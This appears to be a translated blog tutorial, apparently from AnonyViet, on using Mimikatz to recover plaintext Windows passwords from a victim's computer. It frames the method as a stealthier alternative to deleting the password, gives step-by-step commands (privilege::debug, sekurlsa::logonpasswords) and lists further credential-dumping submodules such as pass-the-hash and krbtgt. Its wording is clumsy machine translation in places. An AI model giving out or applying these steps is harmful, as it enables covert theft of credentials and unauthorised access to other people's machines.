Currently, there are many ways to penetrate Windows with a password set by booting with USB and deleting the current password. Thus, it is easy for the victim to find out that the Password has been deleted by someone. With the Mimikatz tool, you will easily let Windows display the victim’s WIndows Password. From now on, you just need to log in with that Password to access Windows easily.
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
Use Mimikatz to view unencrypted Windows Password
Mimikatz is a tool that helps exploit vulnerabilities by displaying Windows Password, hash, PIN code and kerberos tickets in plaintext (PlainText) by manually extracting RAM. mimikatz can also help you see pass-the-hash, pass-the-ticket or built from Golden tickets.
Viruses are often attached to this tool to be able to hack Windows Password, security information, to serve the process of controlling and controlling the victim’s computer in the most powerful way.
To view the Windows Password in plaintext, unencrypted, do the following:
Step 1: Download the Mimikatz . tool will help extract Windows Password.
(Password decompression: anonyviet.com)
Step 2: Unzip the file and access:
- Windows 32 bit: go to folder mimikatz_trunk\Win32
- Windows 64 bit: go to folder: mimikatz_trunk\x64
Step 3: Open file mimikatz.exe with Administrator rights
Step 4: On the interface of minikatz type the command privilege::debug to start Windows debugging mode.
Step 5: Next run the command sekurlsa::logonpasswords to get the Windows password. Password will display as Plaintext.
Also you can combine sekurlsa:: with the commands below to display the login information depending on the security mode.
msv – List LM & NTLM logins
wdigest- Lists WDigest logins
kerberos – Lists Kerberos . credentials
tspkg – Lists TsPkg logins
livessp – Lists LiveSSP credentials
ssp – List SSP logins
logonPasswords – List all vendor logins
process – Switch (or reinit) to the LSASS process context
minidump- Switch (or reinit) to the LSASS minidump context
pth – Pass-the-hash
krbtgt – krbtgt!
dpapisystem – DPAPI_SYSTEM secret
trust – Antisocial
backupkeys – Preferred Backup Master keys
tickets – List of kerberos tickets
ekey – List kerberos . encryption keys
dpapi – List cached MasterKeys
credman – List Credentials Manager
Refer to whitehat.vn